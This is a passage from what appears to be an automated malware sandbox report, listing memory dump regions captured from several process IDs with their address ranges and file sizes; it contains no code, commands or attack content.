                                                                                                                                                                                              Filesize

                                                                                                                                                                                              32KB

                                                                                                                                                                                            • memory/624-129-0x00000261EFC20000-0x00000261EFC3C000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              112KB

                                                                                                                                                                                            • memory/676-141-0x00007FF90DA70000-0x00007FF90DA80000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/676-140-0x00000226E3A40000-0x00000226E3A6B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/952-153-0x00007FF90DA70000-0x00007FF90DA80000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/952-152-0x00000287D0450000-0x00000287D047B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/1000-41-0x00007FF7DE750000-0x00007FF7DE9B6000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2.4MB

                                                                                                                                                                                            • memory/1000-99-0x00007FF7DE750000-0x00007FF7DE9B6000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              2.4MB

                                                                                                                                                                                            • memory/1020-162-0x00007FF90DA70000-0x00007FF90DA80000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/1020-161-0x00000213D12F0000-0x00000213D131B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/1116-164-0x0000020FB2760000-0x0000020FB278B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/1116-165-0x00007FF90DA70000-0x00007FF90DA80000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/1124-168-0x00007FF90DA70000-0x00007FF90DA80000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/1124-167-0x0000023C58100000-0x0000023C5812B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/1132-171-0x00007FF90DA70000-0x00007FF90DA80000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/1132-170-0x000001889FAB0000-0x000001889FADB000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/1176-173-0x0000021899E00000-0x0000021899E2B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/1176-174-0x00007FF90DA70000-0x00007FF90DA80000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/1192-51-0x000002307A1D0000-0x000002307A1F2000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              136KB

                                                                                                                                                                                            • memory/1232-178-0x00000255E0720000-0x00000255E074B000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/1232-179-0x00007FF90DA70000-0x00007FF90DA80000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/1308-182-0x00007FF90DA70000-0x00007FF90DA80000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              64KB

                                                                                                                                                                                            • memory/1308-181-0x000002C3BF8C0000-0x000002C3BF8EB000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              172KB

                                                                                                                                                                                            • memory/2236-740-0x000002B119850000-0x000002B119905000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              724KB

                                                                                                                                                                                            • memory/2280-845-0x0000020F781D0000-0x0000020F78285000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              724KB

                                                                                                                                                                                            • memory/2440-115-0x00007FF7DBBA0000-0x00007FF7DBBF6000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              344KB

                                                                                                                                                                                            • memory/3924-40-0x000000001BBD0000-0x000000001BC82000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              712KB

                                                                                                                                                                                            • memory/3924-39-0x000000001B390000-0x000000001B3E0000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              320KB

                                                                                                                                                                                            • memory/3988-38-0x00007FF92F920000-0x00007FF9303E1000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              10.8MB

                                                                                                                                                                                            • memory/3988-32-0x00007FF92F920000-0x00007FF9303E1000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              10.8MB

                                                                                                                                                                                            • memory/3988-31-0x00000000004B0000-0x0000000000534000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              528KB

                                                                                                                                                                                            • memory/3988-30-0x00007FF92F923000-0x00007FF92F925000-memory.dmp

                                                                                                                                                                                              Filesize

                                                                                                                                                                                              8KB